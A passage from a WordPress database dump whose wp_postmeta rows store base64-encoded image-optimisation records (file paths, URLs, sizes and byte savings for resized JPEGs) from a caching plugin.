XBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJTRS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4MiwidGltZSI6MTQ4MzU2NTk1MSwiaWQiOjE3MzV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29286, 1733, 'wpfc_optimisation_reduction', '26371'); 
INSERT INTO `wp_postmeta` VALUES (29287, 1733, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY1OTU1LCJpZCI6IjE3MzMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJBRC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTM3LCJ0aW1lIjoxNDgzNTY1OTU5LCJpZCI6MTczM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyQUQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMwNzcsInRpbWUiOjE0ODM1NjU5NjIsImlkIjoxNzMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJBRC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjcwNCwidGltZSI6MTQ4MzU2NTk2NSwiaWQiOjE3MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMkFELTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEyOTIxLCJ0aW1lIjoxNDgzNTY1OTY5LCJpZCI6MTczM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyQUQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYxOCwidGltZSI6MTQ4MzU2NTk3MiwiaWQiOjE3MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMkFELTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzIsInRpbWUiOjE0ODM1NjU5NzYsImlkIjoxNzMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJBRC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjEzLCJ0aW1lIjoxNDgzNTY1OTc5LCJpZCI6MTczM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyQUQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5MDMsInRpbWUiOjE0ODM1NjU5ODIsImlkIjoxNzMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMkFELTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTQsInRpbWUiOjE0ODM1NjU5ODYsImlkIjoxNzMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMkFELTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1NzcsInRpbWUiOjE0ODM1NjU5ODksImlkIjoxNzMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMkFELTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NzMsInRpbWUiOjE0ODM1NjU5OTIsImlkIjoxNzMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyQUQtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJBRC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMkFELTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDIwLCJ0aW1lIjoxNDgzNTY1OTk2LCJpZCI6MTczM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMkFELTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJBRC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4MiwidGltZSI6MTQ4MzU2NTk5OSwiaWQiOjE3MzN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29288, 1732, 'wpfc_optimisation_reduction', '21901'); 
INSERT INTO `wp_postmeta` VALUES (29289, 1732, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NjAwNCwiaWQiOiIxNzMyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTExNEMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc1MiwidGltZSI6MTQ4MzU2NjAwNywiaWQiOjE3MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMTRDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNjM1LCJ0aW1lIjoxNDgzNTY2MDExLCJpZCI6MTczMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTExNEMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzNjcsInRpbWUiOjE0ODM1NjYwMTQsImlkIjoxNzMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDUzNywidGltZSI6MTQ4MzU2NjAxOCwiaWQiOjE3MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMTRDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MTYsInRpbWUiOjE0ODM1NjYwMjEsImlkIjoxNzMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDM4LCJ0aW1lIjoxNDgzNTY2MDI1LCJpZCI6MTczMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTExNEMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ5NywidGltZSI6MTQ4MzU2NjAyOCwiaWQiOjE3MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMTRDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDc5LCJ0aW1lIjoxNDgzNTY2MDMyLCJpZCI6MTczMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDExLCJ0aW1lIjoxNDgzNTY2MDM1LCJpZCI6MTczMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTUzLCJ0aW1lIjoxNDgzNTY2MDM4LCJpZCI6MTczMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTY2MDQyLCJpZCI6MTczMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMTRDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Nzk2LCJ0aW1lIjoxNDgzNTY2MDQ1LCJpZCI6MTczMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTExNEMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTE0Qy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTE0Qy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3MiwidGltZSI6MTQ4MzU2NjA0OCwiaWQiOjE3MzJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29290, 1731, 'wpfc_optimisation_reduction', '25488'); 
